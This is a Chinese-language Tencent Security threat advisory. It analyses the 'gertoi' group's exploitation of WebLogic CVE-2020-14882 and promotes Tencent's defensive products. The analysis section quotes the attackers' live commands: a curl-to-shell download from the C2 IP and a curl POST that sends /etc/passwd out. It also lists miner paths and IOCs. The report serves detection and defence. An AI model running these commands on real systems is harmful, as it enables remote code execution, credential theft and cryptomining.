• 产品中心

    产品中心

    • 基础安全

      T-Sec 主机安全

      容器安全服务 TCSS

      T-Sec Web应用防火墙

      T-Sec 云防火墙

      T-Sec 安全运营中心

      T-Sec iOA零信任安全管理系统

    • 业务安全

      T-Sec 天御 验证码

      T-Sec 天御 文本内容安全

      T-Sec 天御 视频内容安全

      T-Sec 全栈式风控引擎

      T-Sec 手游安全

      T-Sec 小程序安全

      T-Sec 应用合规平台

    • 数据安全

      T-Sec 堡垒机

      T-Sec 数据安全审计

      T-Sec 云访问安全代理

      T-Sec 凭据管理系统

      T-Sec 密钥管理系统

      T-Sec 云加密机

      T-Sec 数据安全治理中心

    • 安全服务

      T-Sec 安全专家服务

      一站式等保服务

      T-Sec 安全托管服务

      渗透测试服务

      应急响应服务

      重要时期安全保障服务

      安全攻防对抗服务

    了解全部安全产品

  • 解决方案

    解决方案

    • 通用解决方案

      等保合规安全解决方案

      直播安全解决方案

      数据安全解决方案

      品牌保护解决方案

      高防云主机安全解决方案

      腾讯安心平台解决方案

    • 行业场景方案

      游戏安全场景方案

      电商安全场景方案

      智慧零售场景方案

      智慧出行场景方案

    • 安全专项解决方案

      勒索病毒专项解决方案

      重大保障安全解决方案

  • 更多

    更多

    • 关于我们

      腾讯安全介绍

      荣誉认证

    • 帮助中心

      帮助文档

    • 考试认证

      在线课堂

      证书查询

    • 联系我们

      产品方案咨询

      寻求市场合作

    • 友情链接

      腾讯云

威胁研究正文

腾讯云防火墙成功阻断gertoi团伙利用Weblogic漏洞(CVE-2020-14882)的攻击活动

2021-01-30 02:09:26

腾讯安全云防火墙截获黑客利用Weblogic漏洞(CVE-2020-14882)针对云服务器的攻击行动。如果攻击者利用漏洞攻击得手,就会通过CURL命令将存有Linux系统各类账号密码的文件/etc/passwd上传至C2服务器,从而窃取失陷系统的关键敏感信息,同时再利用失陷服务器挖矿。

一、概述

腾讯安全云防火墙截获黑客利用Weblogic漏洞(CVE-2020-14882)针对云服务器的攻击行动。如果攻击者利用漏洞攻击得手,就会通过CURL命令将存有Linux系统各类账号密码的文件/etc/passwd上传至C2服务器,从而窃取失陷系统的关键敏感信息,同时再利用失陷服务器挖矿。腾讯安全根据发现的恶意程序文件名,将该团伙命名为gertoi团伙。

腾讯安全专家在黑客控制的服务器上发现与挖矿等相关的恶意程序,这些恶意程序会清除竞品挖矿木马,再下载新的挖矿木马。

编号为CVE-2020-14882weblogic高危漏洞,为Oracle官方于202010月发布公告修复的数百个高危漏洞之一。未经授权的攻击者可以绕过WebLogic后台登录限制,直接远程利用反序列化漏洞,从而完全接管WebLogic服务器,风险极大。

腾讯安全系列产品已针对Gertoi黑产团伙进行升级响应,具体清单如下:

应用场景

安全产品

解决方案

腾讯T-Sec

威胁情报云查服务

SaaS

1Gertoi团伙相关IOCs已入库。

各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics

腾讯T-Sec

高级威胁追溯系统

1Gertoi团伙相关信息和情报已支持检索。

网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts

云原生安全

防护

云防火墙

Cloud FirewallCFW

基于网络流量进行威胁检测与主动拦截,已支持:

1)已支持识别检测Gertoi团伙关联的IOCs

2)已支持检测和拦截Weblogic未授权命令执行漏洞(CVE-2020-14882/14883

有关云防火墙的更多信息,可参考:
https://cloud.tencent.com/product/cfw

腾讯T-Sec  主机安全

Cloud Workload ProtectionCWP

1)已支持查杀Gertoi团伙相关木马程序;

2)已支持检测Weblogic未授权命令执行漏洞(CVE-2020-14882/14883

腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp

腾讯T-Sec 安全运营中心

基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。

关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html

非云企业安全防护

腾讯T-Sec

高级威胁检测系统

(腾讯御界)

1)已支持检测Weblogic未授权命令执行漏洞(CVE-2020-14882/14883

关于T-Sec高级威胁检测系统的更多信息,可参考:

https://cloud.tencent.com/product/nta

二、详细分析

腾讯云防火墙检测到黑客利用Weblogci漏洞CVE-2020-14882针对云主机的攻击,攻击源IP144.217.207.100


漏洞攻击后执行的恶意命令为:

curl http[:]//144.217.207.100:2222/gertoi | sh

gertoi是另外一条命令:

curl --data-binary "@/etc/passwd" http[:]//144.217.207.100:2223

curl通过POST请求将保存Linux账号密码的文件/etc/passwd上传至服务器

144.217.207.100:2223,接着服务器端通过 “GET request for /”命令来接收数据。


/etc/passwd文件中保存了大量的账号密码信息,服务器被攻击成功可能导致用户敏感信息泄露。


此外,在黑客控制的服务器上还发现与挖矿相关的攻击样本。


其中,Code文件中包含清除其他竞品挖矿木马的代码:


根据黑客服务器的挖矿木马配置信息发现,如果攻击得手,会在以下目录安装挖矿木马:

/var/tmp/dasdawdasdawdas

/tmp/dasdawdasdawdas

/dev/shm/dasdawdasdawdas


IOCs

URL

http[:]//144.217.207.100:2222/gertoi

http[:]//144.217.207.100:2222/download

http[:]//144.217.207.100:1231/.code

http[:]//144.217.207.100:2223

http[:]//144.217.207.100:1231/.dddasd.tar.gz


MD5

gertoi 

7fe7871cfcd6a3eade11dc9f9f8925d6


code

78818412331e180b5479be68a48b797d

  • 产品方案

    • 产品中心

  • 威胁研究

    • 威胁通告
    • 研究报告

  • 合作伙伴

    • 合作伙伴详情

  • 其他

    • 腾讯安全介绍
    • 新闻活动
    • 在线课堂

  • 友情链接

    • 腾讯云

腾讯安全公众号

腾讯安全视频中心

Copyright©1998-2024 Tencent. All Rights Reserved.

在线咨询

方案定制